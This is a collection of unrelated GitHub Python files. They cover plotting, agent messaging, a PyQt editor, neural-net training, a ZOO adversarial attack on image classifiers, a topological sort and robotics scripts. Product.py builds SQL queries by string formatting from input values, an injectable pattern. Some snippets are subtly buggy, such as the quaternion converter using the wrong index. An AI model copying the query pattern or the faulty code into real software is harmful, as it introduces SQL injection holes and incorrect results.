1000, dtype=np.float32)\n yvalues = np.linspace(ymin, ymax, 1000, dtype=np.float32) \n \n t0 = time.time()\n c = xvalues + yvalues[:,None]*1j \n rectangle = mandel2(c, 1000) \n t1 = time.time()\n print(\"Runtime mandelbro: {}\".format(t1-t0))\n\n\n # make the image & show it\n plt.figure(figsize=(18,18))\n plt.imshow(rectangle.T, interpolation=\"nearest\")\n plt.savefig(\"mandelbrot2.png\")\n plt.show()\n\n return(xvalues,yvalues,rectangle.T)\n \nmandelbrot2(-2.0, 0.5, -1.25, 1.25)","repo_name":"yastaheran/Litt-Paa-Sia","sub_path":"Python/Mandelbrot/mandelbrot_2.py","file_name":"mandelbrot_2.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11132245566","text":"from osbrain import NSProxy\nfrom osbrain import run_agent\nimport osbrain\nimport pickle\nimport time\n\nif __name__ == '__main__':\n ns_sock = '127.0.0.1:1129'\n osbrain.config['TRANSPORT'] = 'tcp'\n osbrain.config['SERIALIZER'] = 'json'\n\n print('Registering Agent with server...')\n alice = run_agent('Alice', ns_sock)\n nameserver = NSProxy(ns_sock)\n alice_address_to_connect = nameserver.proxy('Bob').addr('main')\n print(\"Alice is connecting to address: \" + str(alice_address_to_connect))\n alice.connect(alice_address_to_connect, alias='main')\n print('I have joined the nameserver!')\n\n for i in range(10):\n print(\"I try to say HEY!\")\n alice.send('main', 'Hey')\n print(\"I tried\")\n time.sleep(2)\n\n print(\"Done\")\n exit(0)\n","repo_name":"muratcanakcay/Agent-Systems-and-Software-Applications","sub_path":"lab6/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27672851038","text":"from glob import glob\n\nfrom setuptools import setup\n\npackage_name = 'rqt_robot_dashboard'\nsetup(\n name=package_name,\n version='0.5.8',\n package_dir={'': 'src'},\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name + '/images', glob('images/*.svg')),\n ('share/' + package_name, ['package.xml']),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n author=\"Ze'ev Klapow\",\n maintainer='David V. Lu!!',\n maintainer_email='davidvlu@gmail.com',\n description=(\n 'rqt_robot_dashboard provides an infrastructure for building robot dashboard plugins in rqt.'\n ),\n license='BSD',\n)\n","repo_name":"ros2-gbp/rqt_robot_dashboard-release","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"69797720410","text":"from .task import Task\nfrom .worker_result_receiver import WorkerResultReceiver\n\n\n\nclass TasksManager:\n\n def __init__(self, function, arguments_list, callback):\n self.function = function\n self.arguments_list = arguments_list\n self.callback = callback\n\n\n def callback_not_in_order_tasks_list(self):\n for argument in self.arguments_list:\n yield Task(self.function, argument, self.callback)\n\n\n def callback_in_order_tasks_list(self):\n worker_result_receiver = WorkerResultReceiver(self.callback)\n\n # Feed tasks with sequential id, so handler can handle result in order\n count = 0\n for argument in self.arguments_list:\n yield Task(\n lambda argument_with_count: (argument_with_count[0], self.function(argument_with_count[1])),\n (count, argument),\n lambda result_with_count: worker_result_receiver.receive(result_with_count),\n )\n count += 1\n","repo_name":"hothienlac/multiworkers","sub_path":"tasks_manager.py","file_name":"tasks_manager.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"36147782285","text":"# -*- coding: utf-8 -*-\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom edit_ui import Ui_editVM\nimport sys\nfrom util import errorBox, saveConfig\n\n\nclass editVMiW(Ui_editVM):\n def setupWin(self, editVM, datadict, name, runningVM):\n self.setupUi(editVM)\n self.runningVM = runningVM\n self.datadict = datadict\n self.changed = False\n self.window = editVM\n self.vmName.setText(name)\n (description, path) = self.datadict['VMList'][name]\n self.vmname = name\n self.vmDescription.setText(description)\n self.vmPath.setText(path)\n self.vmName.textChanged.connect(self.setChanged)\n self.vmPath.textChanged.connect(self.setChanged)\n self.vmDescription.textChanged.connect(self.setChanged)\n self.editButton.clicked.connect(self.editButtonClicked)\n self.cancelButton.clicked.connect(self.cancelButtonClicked)\n\n def setChanged(self):\n self.changed = True\n\n def editButtonClicked(self):\n import os\n if self.changed:\n newName = self.vmName.text()\n newDesc = self.vmDescription.text()\n newPath = self.vmPath.text()\n if not(self.vmname in self.runningVM.keys()):\n if self.vmname in self.datadict['VMList'].keys():\n nope,nope1 = self.datadict['VMList'].pop(self.vmname)\n if os.path.exists(newPath):\n self.datadict['VMList'][newName] = (newDesc, newPath)\n saveConfig(self.datadict)\n if self.configureCheck.isChecked():\n if '86BoxPath' in self.datadict.keys():\n import subprocess\n ops = []\n ops.append(self.datadict['86BoxPath'])\n if 'RomOverride' in self.datadict.keys():\n if self.datadict['RomOverride']:\n ops.append('-R')\n ops.append(self.datadict['RomPath'])\n ops.append('-P')\n ops.append(path)\n ops.append('-V')\n ops.append(newName)\n ops.append('-S')\n p = subprocess.Popen(ops)\n p.wait()\n if self.startVMcheck.checkState():\n self.datadict['RunVM'] = newName\n else:\n errorBox(self, self.window, \"Error\", \"Path doesn't exist.\")\n else:\n errorBox(self, self.window, \"Error\", \"VM Still running. Cannot Edit\")\n\n self.window.close()\n\n def cancelButtonClicked(self):\n self.window.close()\n\n def pathBrowseClicked(self):\n browse = QtWidgets.QFileDialog()\n browse.setFileMode(QtWidgets.QFileDialog.Directory)\n browse.setOption(QtWidgets.QFileDialog.ShowDirsOnly)\n if browse.exec_() == QtWidgets.QDialog.Accepted:\n filename = browse.selectedFiles()\n if filename:\n if os.path.exists(filename[0]):\n self.vmPath.setText(filename[0])\n","repo_name":"insanemal/86box_manager_py","sub_path":"src/edit.py","file_name":"edit.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"31"} +{"seq_id":"31838049808","text":"from torchvision.models.resnet import resnet101, resnet18\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport time, torch\nfrom datetime import datetime\nfrom sklearn.metrics import classification_report\nfrom utils import timeSince\nimport numpy as np\n\nclass Model(nn.Module):\n def __init__(self, in_features = 1000, num_material= 2, num_color= 8 , num_size = 2, height= 440, width = 520, pretrained= False, device=\"cuda\"):\n super().__init__()\n self.net = resnet18(pretrained=True)\n self.predictorSize = PredictorSize(num_size, in_features)\n self.predictorMaterial = PredictorMaterial(num_material, in_features)\n self.predictorColor = PredictorColor(num_color, in_features)\n self.heigth = height\n self.width = width\n\n\n if pretrained:\n PATH_OUTPUT_MODEL = \"/home/brenda/Documents/master/semestre3/independent_study/generate_graph_clean/output/fex_model_20220328_103143\"\n self.load_state_dict(torch.load(PATH_OUTPUT_MODEL, map_location=device))\n\n def forward(self, x):\n #new_x = x.to(\"cuda\")\n #print(type(new_x))\n new_x = x.view(5, 3, self.heigth, self.width)\n new_x = self.net(new_x)\n predictor_size = self.predictorSize(new_x)\n predictor_material = self.predictorMaterial(new_x)\n predictor_color = self.predictorColor(new_x)\n\n return predictor_color, predictor_size, predictor_material,\n\nclass PredictorSize(nn.Module):\n def __init__(self, num_classes, in_features):\n super().__init__()\n self.W = nn.Linear(in_features, num_classes)\n self.X = nn.Linear(num_classes, num_classes)\n\n def forward(self, data):\n w = self.W(data)\n x = self.X(w)\n return x\n\nclass PredictorMaterial(nn.Module):\n def __init__(self, num_classes, in_features):\n super().__init__()\n self.W = nn.Linear(in_features, num_classes)\n self.X = nn.Linear(num_classes, num_classes)\n\n def forward(self, data):\n w = self.W(data)\n x = self.X(w)\n return x\n\nclass PredictorColor(nn.Module):\n def __init__(self, num_classes, in_features):\n super().__init__()\n self.W = nn.Linear(in_features, 500)\n self.X = nn.Linear(500, num_classes)\n self.Y = nn.Linear(num_classes, num_classes)\n\n def forward(self, data):\n w = self.W(data)\n x = self.X(w)\n y = self.Y(x)\n return y\n\ndef train_conv_net(model, data, n_iters, print_every=1, plot_every=1, device = \"cuda\"):\n PATH_OUTPUT_MODEL = \"/home/brenda/Documents/master/semestre3/independent_study/generate_graph_clean/output/\"\n\n model.to(device)\n model.net.requires_grad = False\n plot_losses = []\n plot_acc = []\n\n print_loss_total = 0 # Reset every print_every\n print_acc_total = [0, 0, 0] # Reset every print_every\n\n plot_loss_total = 0 # Reset every plot_every\n plot_acc_total = 0 # Reset every plot_every\n\n start = time.time()\n t = datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n\n opt = torch.optim.Adam(model.parameters(), lr=3e-4, weight_decay=0.0001)\n\n print(\"--------- training started ---------\")\n for iter in range(1, n_iters + 1):\n idx_g = 0\n epoch_loss = 0\n epoch_acc = [0,0,0]\n\n for d in data:\n for i in range(len(d)):\n model.train()\n input_features = d[\"pixel_mask\"][i]\n color_labels = d[\"colors\"][i]\n size_labels = d[\"sizes\"][i]\n material_labels = d[\"materials\"][i]\n #with torch.no_grad():\n color_predictions, size_predictions, material_predictions = model(input_features)\n\n loss_color = F.cross_entropy(color_predictions, color_labels)\n loss_size = F.cross_entropy(size_predictions, size_labels)\n loss_material = F.cross_entropy(material_predictions, material_labels)\n\n loss = loss_color + loss_size + loss_material\n\n opt.zero_grad()\n loss.backward()\n opt.step()\n\n epoch_loss += float(loss)\n #epoch_acc += evaluate(model, val_data)\n idx_g += 1\n print_loss_total += (epoch_loss / idx_g)\n plot_loss_total += (epoch_loss / idx_g)\n\n #print_acc_total += (epoch_acc / idx_g)\n #plot_acc_total += (epoch_acc / idx_g)\n\n if iter % print_every == 0:\n print_loss_avg = print_loss_total / print_every\n print_loss_total = 0\n\n #print_acc_avg = print_acc_total / print_every\n print_acc_total = 0\n #print('%s (%d %d%%) %.4f -- C: %.4f S: %.4f M: %.4f' % (\n #timeSince(start, iter / n_iters), iter, iter / n_iters * 100, print_loss_avg, print_acc_avg[0], print_acc_avg[1], print_acc_avg[2]))\n\n print('%s (%d %d%%) %.4f' % (\n timeSince(start, iter / n_iters), iter, iter / n_iters * 100, print_loss_avg))\n\n #torch.save(model.state_dict(), PATH_OUTPUT_MODEL + \"fex_model_{}\".format(t))\n\n if iter % plot_every == 0:\n plot_loss_avg = plot_loss_total / plot_every\n plot_losses.append(plot_loss_avg)\n plot_loss_total = 0\n\n plot_acc_avg = plot_acc_total / plot_every\n plot_acc.append(plot_acc_avg)\n plot_acc_total = 0\n return plot_losses, plot_acc\n\ndef evaluate(model, data):\n model.eval()\n acc=0\n acc_sizes = 0\n acc_material = 0\n\n len_acc = 5 * len(data)\n\n for d in data:\n for i in range(len(d)):\n input_features = d[\"pixel_mask\"][i]\n color_labels = d[\"colors\"][i]\n size_labels = d[\"sizes\"][i]\n material_labels = d[\"materials\"][i]\n color_predictions, size_predictions, material_predictions = model(input_features)\n\n _, indices = torch.max(color_predictions, dim=1)\n _, indices_sizes = torch.max(size_predictions, dim=1)\n _, indices_materials = torch.max(material_predictions, dim=1)\n\n correct = torch.sum(indices == color_labels)\n correct_sizes = torch.sum(indices_sizes == size_labels)\n correct_materials = torch.sum(indices_materials == material_labels)\n\n acc += (correct.item() * 1.0 / len(color_predictions))\n acc_sizes += (correct_sizes.item() * 1.0 / len(size_predictions))\n acc_material += (correct_materials.item() * 1.0 / len(material_predictions))\n return np.array([acc/len_acc, acc_sizes/len_acc, acc_material/len_acc])\n\ndef covnet_predict(model, data_item, device=\"cuda\"):\n\n model.to(device)\n model.eval()\n\n input_features = data_item\n color_predictions, size_predictions, material_predictions = model(input_features)\n\n material = {\n 0: \"metal\",\n 1: \"rubber\",\n }\n\n size = {\n 0: \"small\",\n 1: \"large\",\n }\n\n color = {\n 0: \"gray\",\n 1: \"red\",\n 2: \"blue\",\n 3: \"green\",\n 4: \"brown\",\n 5: \"purple\",\n 6: \"cyan\",\n 7: \"yellow\",\n }\n\n colors = []\n for c in list(torch.max(color_predictions, axis=1).indices):\n colors.append(color[c.item()])\n\n sizes = []\n for s in list(torch.max(size_predictions, axis=1).indices):\n sizes.append(size[s.item()])\n\n materials = []\n for m in list(torch.max(material_predictions, axis=1).indices):\n materials.append(material[m.item()])\n\n return colors, sizes, materials, color_predictions, size_predictions, material_predictions\n\ndef evaluate_model(model, data, device=\"cuda\"):\n model.to(device)\n model.eval()\n\n clr_labels = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\"]\n sz_labels = [\"0\", \"1\"]\n mtl_labels = [\"0\", \"1\"]\n\n total_pred_c = []\n total_pred_s = []\n total_pred_m = []\n\n total_labels_c = []\n total_labels_s = []\n total_labels_m = []\n\n #for d in data:\n for d in data:\n for i in range(len(d)):\n input_features = d[\"pixel_mask\"][i]\n color_labels = d[\"colors\"][i]\n size_labels = d[\"sizes\"][i]\n material_labels = d[\"materials\"][i]\n color_predictions, size_predictions, material_predictions = model(input_features)\n\n total_labels_c.extend(color_labels.tolist())\n total_labels_s.extend(size_labels.tolist())\n total_labels_m.extend(material_labels.tolist())\n\n total_pred_c.extend(torch.max(color_predictions, axis=1).indices.tolist())\n total_pred_s.extend(torch.max(size_predictions, axis=1).indices.tolist())\n total_pred_m.extend(torch.max(material_predictions, axis=1).indices.tolist())\n print(classification_report(total_labels_c, total_pred_c, target_names=clr_labels))\n print(classification_report(total_labels_s, total_labels_s, target_names=sz_labels))\n print(classification_report(total_labels_m, total_pred_m, target_names=mtl_labels))","repo_name":"BScarleth/generate_graph_clean","sub_path":"Features_Extraction.py","file_name":"Features_Extraction.py","file_ext":"py","file_size_in_byte":8782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3604829236","text":"import torch\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport numpy as np\n\nclass ZOO(object):\n def __init__(self,model):\n self.model = model\n \n def get_loss(self,xi,label_onehot_v, c, modifier, TARGETED):\n #print(c.size(),modifier.size())\n loss1 = c*torch.sum(modifier*modifier)\n #output = net(torch.clamp(xi+modifier,0,1))\n output = self.model.predict(xi+modifier)\n real = torch.max(torch.mul(output, label_onehot_v), 1)[0]\n other = torch.max(torch.mul(output, (1-label_onehot_v))-label_onehot_v*10000,1)[0]\n #print(real,other)\n if TARGETED:\n loss2 = torch.sum(torch.clamp(other - real, min=0))\n else:\n loss2 = torch.sum(torch.clamp(real - other, min=0))\n error = loss2 + loss1 \n return error,loss1,loss2\n\n def zoo(self, input_xi, label_or_target, c, TARGETED=False):\n step_size = 0.1\n modifier = Variable(torch.zeros(input_xi.size()).cuda())\n yi = label_or_target\n label_onehot = torch.FloatTensor(yi.size()[0],self.model.num_classes)\n label_onehot.zero_()\n label_onehot.scatter_(1,yi.view(-1,1),1)\n label_onehot_v = Variable(label_onehot, requires_grad=False).cuda()\n xi = Variable(input_xi.cuda())\n #optimizer = optim.Adam([modifier], lr = 0.1)\n best_loss1 = 1000\n best_adv = None\n num_coor = 1\n delta = 0.0001\n for it in range(20000):\n #optimizer.zero_grad()\n error1,loss11,loss12 = self.get_loss(xi,label_onehot_v,c,modifier, TARGETED)\n for j in range(num_coor):\n modifier = Variable(torch.zeros(xi.size()).cuda(), volatile=True)\n randx = np.random.randint(xi.size()[0])\n randy = np.random.randint(xi.size()[1])\n randz = np.random.randint(xi.size()[2])\n modifier[randx,randy,randz] = delta\n #print(modifier)\n new_xi = xi + modifier\n error2,loss21,loss22 = self.get_loss(new_xi,label_onehot_v,c,modifier, TARGETED)\n modifier_gradient = (error2 - error1) / delta * modifier\n modifier -= step_size*modifier_gradient\n xi = xi + modifier\n #self.model.get_gradient(error)\n #error.backward()\n #optimizer.step()\n if (it)%1000==0:\n print(error1.data[0],loss11.data[0],loss12.data[0]) \n return xi\n \n def random_zoo(self, input_xi, label_or_target, c, TARGETED=False):\n step_size = 5e-3 \n modifier = Variable(torch.zeros(input_xi.size()).cuda())\n yi = label_or_target\n label_onehot = torch.FloatTensor(yi.size()[0],self.model.num_classes)\n label_onehot.zero_()\n label_onehot.scatter_(1,yi.view(-1,1),1)\n label_onehot_v = Variable(label_onehot, requires_grad=False).cuda()\n xi = Variable(input_xi.cuda(),requires_grad=False)\n #optimizer = optim.Adam([modifier], lr = 0.1)\n best_loss1 = 1000\n best_adv = None\n num_coor = 1\n delta = 1e-6\n modifier = Variable(torch.zeros(xi.size()).cuda(), volatile=True)\n for it in range(20000):\n #optimizer.zero_grad()\n error1,loss11,loss12 = self.get_loss(xi,label_onehot_v,c,modifier, TARGETED)\n u=torch.randn(xi.size()).cuda()\n error2,loss21,loss22 = self.get_loss(xi,label_onehot_v,c,modifier+delta*u, TARGETED)\n modifier_gradient = (error2 - error1) / delta * u\n modifier.data = modifier.data - step_size*modifier_gradient\n #xi = xi + modifier\n #self.model.get_gradient(error)\n #error.backward()\n #optimizer.step()\n if (it)%100==0:\n print(it,error1.item(),loss11.item(),loss12.item()) \n return xi \n\n def __call__(self, input_xi, label_or_target, c=0.1, TARGETED=False):\n adv = self.random_zoo(input_xi, label_or_target, c, TARGETED)\n return adv \n \n \n","repo_name":"cmhcbb/attackbox","sub_path":"attack/ZOO.py","file_name":"ZOO.py","file_ext":"py","file_size_in_byte":4077,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"31"} +{"seq_id":"22273652592","text":"from dao.DataAccessObject import DataAccessObject\nfrom psycopg2.extras import RealDictCursor\nimport json\n\nclass Product(object):\n\n\tdef read(self):\n\t\tconn = DataAccessObject().getConnection()\n\t\tcursor = conn.cursor(cursor_factory=RealDictCursor)\n\n\t\tsql = '''\n\t\t\t\tSELECT\n\t\t\t\t p.id,\n\t\t\t\t p.seller,\n\t\t\t\t p.name,\n\t\t\t\t pp.price,\n\t\t\t\t (select array_to_json(array_agg(product_image)) from product_image where product_id=p.id) as image\n\t\t\t\tFROM\n\t\t\t\t sinsa.product as p\n\t\t\t\t INNER JOIN product_price as pp ON p.id = pp.product_id\n\t\t\t\tWHERE\n\t\t\t\t p.status=100\n\t\t\t\t'''\n\t\tcursor.execute(sql)\n\t\tproducts = cursor.fetchall()\n\n\t\tcursor.close()\n\t\tconn.close()\n\n\t\treturn products\n\n\tdef get(self, id):\n\t\tconn = DataAccessObject().getConnection()\n\t\tcursor = conn.cursor(cursor_factory=RealDictCursor)\n\n\t\tsql = '''\n\t\t\t\t\tSELECT\n\t\t\t\t\t\tp.id,\n\t\t\t\t\t\tp.seller,\n\t\t\t\t\t\tp.name,\n\t\t\t\t\t\tpp.price,\n\t\t\t\t\t\t(select array_to_json(array_agg(product_image)) from product_image where product_id={id}) as image\n\t\t\t\t\tFROM \n\t\t\t\t\t\tsinsa.product as p\n\t\t\t\t\tINNER JOIN product_price as pp ON p.id = pp.product_id\n\n\t\t\t\t\tWHERE\n\t\t\t\t\t status=100\n\t\t\t\t\t AND p.id={id}\n\t\t\t\t\t'''.format(id=id)\n\n\t\tcursor.execute(sql)\n\t\tproduct = cursor.fetchall()\n\n\t\tcursor.close()\n\t\tconn.close()\n\n\t\treturn product\n\n\tdef create(self, seller, name):\n\n\t\tconn = DataAccessObject().getConnection()\n\t\tcursor = conn.cursor()\n\n\t\tsql = '''\n\t\t\t\tINSERT INTO sinsa.product (seller, name) \n\t\t\t\tVALUES (\n\t\t\t\t\t{seller},\n\t\t\t\t\t'{name}'\n\t\t\t\t)\n\t\t\t\treturning id\n\t\t\t\t'''.format(seller=seller,\n\t\t name=name)\n\n\t\tcursor.execute(sql)\n\t\tconn.commit()\n\n\t\tproduct_id = cursor.fetchone()[0]\n\n\t\tcursor.close()\n\t\tconn.close()\n\n\t\treturn product_id","repo_name":"TerryJang/taeil-api","sub_path":"src/mo/product/Product.py","file_name":"Product.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31429013879","text":"import numpy as np\nimport math\nimport rospy as tf\n\ndef euler_to_quaternion(roll, pitch, yaw): # X Y Z\n quaternion = tf.transformations.quaternion_from_euler(roll, pitch, yaw)\n\n qx = quaternion[0]\n qy = quaternion[1]\n qz = quaternion[2]\n qw = quaternion[0]\n\n return [qw,qx,qy,qz]\n\n\n\n\n \nX = 57\nY = 57\nZ = 57\n\nprint(\"X: \", X)\nprint(\"Y: \", Y)\nprint(\"Z: \", Z)\n\nX = math.radians(X)\nY = math.radians(Y)\nZ = math.radians(Z)\n\nquat = euler_to_quaternion(X,Y,Z)\nprint(\"Qw:\", quat[0], \"Qx: \", quat[1], \"Qy: \", quat[2], \"Qz: \", quat[3],)\n","repo_name":"sloganking/FbxToMimic","sub_path":"Utils/Testing/Conversions.py","file_name":"Conversions.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"31"} +{"seq_id":"41971500312","text":"from sys import argv\nfrom stack_array import *\nfrom operator import itemgetter\n\ndef tsort(vertices):\n '''\n * Performs a topological sort of the specified directed acyclic graph. The\n * graph is given as a list of vertices where each pair of vertices represents\n * an edge in the graph. The resulting string return value will be formatted\n * identically to the Unix utility {@code tsort}. That is, one vertex per\n * line in topologically sorted order.\n *\n * Raises a ValueError if:\n * - vertices is emtpy with the message \"input contains no edges\"\n * - vertices has an odd number of vertices (incomplete pair) with the\n * message \"input contains an odd number of tokens\"\n * - the graph contains a cycle (isn't acyclic) with the message\n * \"input contains a cycle\"'''\n a = f1(vertices)\n a = sortr(a)\n f2(a)\n a = sortr(a)\n ss = Stack(len(a))\n f43(a, ss, vertices)\n a = sortr(a)\n if ss.num_items == 0:\n raise ValueError(\"input contains a cycle\")\n rlis = f4(a, ss, vertices)\n rstr = \"\"\n for i in rlis:\n rstr += i + \"\\n\"\n return rstr\n\ndef f1(vertices):\n a = []\n if (len(vertices)%2) != 0:\n raise ValueError(\"input contains an odd number of tokens\")\n if vertices == []:\n raise ValueError(\"input contains no edges\")\n for n in range(0, len(vertices)):\n if (n%2) == 0:\n if vertices[n] == \"\":\n raise ValueError(\"input contains no edges\")\n inn = False\n for i in a:\n if (i != None) and (i[0] == vertices[n]):\n inn = True\n i[2].append(vertices[n+1])\n if not inn:\n c = []\n c.append(vertices[n+1])\n temp = [vertices[n], 0, c]\n a.append(temp)\n else:\n if vertices[n] == \"\":\n raise ValueError(\"input contains no edges\")\n inn = False\n for i in a:\n if (i != None) and (i[0] == vertices[n]):\n inn = True\n if not inn:\n c = []\n temp = [vertices[n], 0, c]\n a.append(temp)\n return a\n\ndef f2(a):\n for i in a:\n for n in a:\n for s in n[2]:\n if i[0] == s:\n i[1] += 1\n\ndef f3(a, ss):\n for i in a:\n if i[1] == 0:\n ss.push(i)\n if ss.num_items == 0:\n raise ValueError(\"input contains a cycle\")\n\ndef f4(a, ss, vertices):\n rlis = []\n alen = len(a)\n while ss.num_items > 0:\n a = sortr(a)\n temp = ss.pop()\n rlis.append(temp[0])\n if len(a) > 0:\n f42(temp, a)\n f43(a, ss, vertices)\n cc(ss, a)\n return rlis\n\ndef cc(ss, a):\n if ccheck(ss, a) == False:\n raise ValueError(\"input contains a cycle\")\n\ndef ccheck(ss, a):\n if (ss.num_items == 0) and (len(a) > 0):\n return False\n else:\n return True\n\ndef f42(temp, a):\n done = False\n cc = 0\n while done == False:\n if (cc) == len(a):\n done = True\n else:\n if a[cc][1] == 0:\n a.remove(a[cc])\n else:\n cc += 1\n for i in temp[2]:\n for n in range(len(a)):\n if (a[n] != None) and (i == a[n][0]):\n a[n][1] -= 1\n\ndef f43(a, ss, vertices):\n new = []\n for i in a:\n if (i[1] == 0):\n new.append(i)\n for i in vertices:\n for n in new:\n if i == n[0]:\n ss.push(n)\n new.remove(n)\n\ndef sortr(a):\n new = []\n while len(a) > 0:\n lowest = a[0]\n for i in a:\n try:\n if int(i[0]) < int(lowest[0]):\n lowest = i\n except:\n if i[0] < lowest[0]:\n lowest = i\n new.append(lowest)\n a.remove(lowest)\n return new\n\ndef main():\n '''Entry point for the tsort utility allowing the user to specify\n a file containing the edge of the DAG'''\n if len(argv) != 2:\n print(\"Usage: python3 tsort.py \")\n exit()\n try:\n f = open(argv[1], 'r')\n except FileNotFoundError as e:\n print(argv[1], 'could not be found or opened')\n exit()\n\n vertices = []\n for line in f:\n vertices += line.split()\n f.close()\n try:\n result = tsort(vertices)\n return result\n except Exception as e:\n print(e)\n\nif __name__ == '__main__':\n main()\n","repo_name":"benaasheim/CPE202fall2018","sub_path":"lab8-benaasheim-master/tsort.py","file_name":"tsort.py","file_ext":"py","file_size_in_byte":4534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21817076203","text":"from imageai.Detection import ObjectDetection\nimport os\nimport json\n\nclass Model(object):\n def __init__(self):\n print(\"Initializing class .......\")\n self.execution_path = os.getcwd()\n self.detector = ObjectDetection()\n self.detector.setModelTypeAsRetinaNet()\n self.detector.setModelPath( os.path.join(self.execution_path , \"resnet50_coco_best_v2.1.0.h5\"))\n #self.detector.setModelTypeAsTinyYOLOv3()\n #self.detector.setModelPath( os.path.join(self.execution_path , \"yolo-tiny.h5\"))\n self.detector.loadModel(\"fast\")\n print(\"Loading model..........\")\n\n def predict(self,X,feature_name):\n self.detections = self.detector.detectObjectsFromImage(input_image=os.path.join(self.execution_path , X),output_image_path=os.path.join(self.execution_path , \"output-image.jpg\"),minimum_percentage_probability=50)\n return os.path.join(self.execution_path , \"output-image.jpg\")","repo_name":"lakshikaparihar/object-detection-seldon","sub_path":"imgToImg/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"40803289882","text":"\"\"\"\nDescription:\nA random card generator as made exclusively by me, it removes the card from the deck when it has been chosen and displays\nit into a tkinter GUI\nAuthor: Robbie Campbell\nDate: 26/08/2020\n\"\"\"\n\nfrom Classes.Home.choice import Options\nimport tkinter as tk\n\n# Execute the application\nif __name__ == \"__main__\":\n root = tk.Tk()\n app = Options(master=root)\n root.title(\"Home\")\n app.mainloop()\n","repo_name":"rcampbell1337/Mini_App_Directory","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31680031145","text":"import glob\r\nimport os\r\nimport sys\r\nimport argparse\r\ntry:\r\n sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (\r\n sys.version_info.major,\r\n sys.version_info.minor,\r\n 'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])\r\nexcept IndexError:\r\n pass\r\n\r\nimport carla\r\n\r\n\r\nclient = carla.Client('localhost', 2000)\r\nclient.set_timeout(2.0)\r\ndef draw_waypoints(world,waypoints, road_id=None, life_time=50.0):\r\n\r\n for waypoint in waypoints:\r\n\r\n if(waypoint.road_id == road_id):\r\n world.debug.draw_string(waypoint.transform.location, 'O', draw_shadow=False,\r\n color=carla.Color(r=0, g=255, b=0), life_time=life_time,\r\n persistent_lines=True)\r\ndef main():\r\n argparser = argparse.ArgumentParser(\r\n description='CARLA Sensor tutorial')\r\n argparser.add_argument(\r\n '--host',\r\n metavar='H',\r\n default='127.0.0.1',\r\n help='IP of the host server (default: 127.0.0.1)')\r\n argparser.add_argument(\r\n '-p', '--port',\r\n metavar='P',\r\n default=2000,\r\n type=int,\r\n help='TCP port to listen to (default: 2000)')\r\n argparser.add_argument(\r\n '--sync',\r\n action='store_true',\r\n help='Synchronous mode execution')\r\n argparser.add_argument(\r\n '--async',\r\n dest='sync',\r\n action='store_false',\r\n help='Asynchronous mode execution')\r\n \r\n argparser.set_defaults(sync=True)\r\n\r\n args = argparser.parse_args()\r\n\r\n #args.width, args.height = [int(x) for x in args.res.split('x')]\r\n\r\n try:\r\n client = carla.Client(args.host, args.port)\r\n client.set_timeout(5.0)\r\n world=client.get_world()\r\n waypoints = world.get_map().generate_waypoints(distance=1.0)\r\n for i in range(0,1):\r\n draw_waypoints(world,waypoints, road_id=i, life_time=20)\r\n finally:\r\n print(\"Bye\")\r\nif __name__ == '__main__':\r\n main()","repo_name":"nargoo0328/CARLA","sub_path":"find_waypoints.py","file_name":"find_waypoints.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"342093350","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport exceptions\n\nfrom keystoneclient import exceptions as keystone_exceptions\n\nfrom heat.engine.clients.os import keystone\nfrom heat.engine import constraints\n\n\nclass KeystoneClientPlugin(keystone.KeystoneClientPlugin):\n\n def get_role_id(self, role):\n try:\n role_obj = self.client().client.roles.get(role)\n return role_obj.id\n except keystone_exceptions.NotFound:\n role_list = self.client().client.roles.list(name=role)\n for role_obj in role_list:\n if role_obj.name == role:\n return role_obj.id\n\n raise exceptions.KeystoneRoleNotFound(role_id=role)\n\n def get_project_id(self, project):\n try:\n project_obj = self.client().client.projects.get(project)\n return project_obj.id\n except keystone_exceptions.NotFound:\n project_list = self.client().client.projects.list(name=project)\n for project_obj in 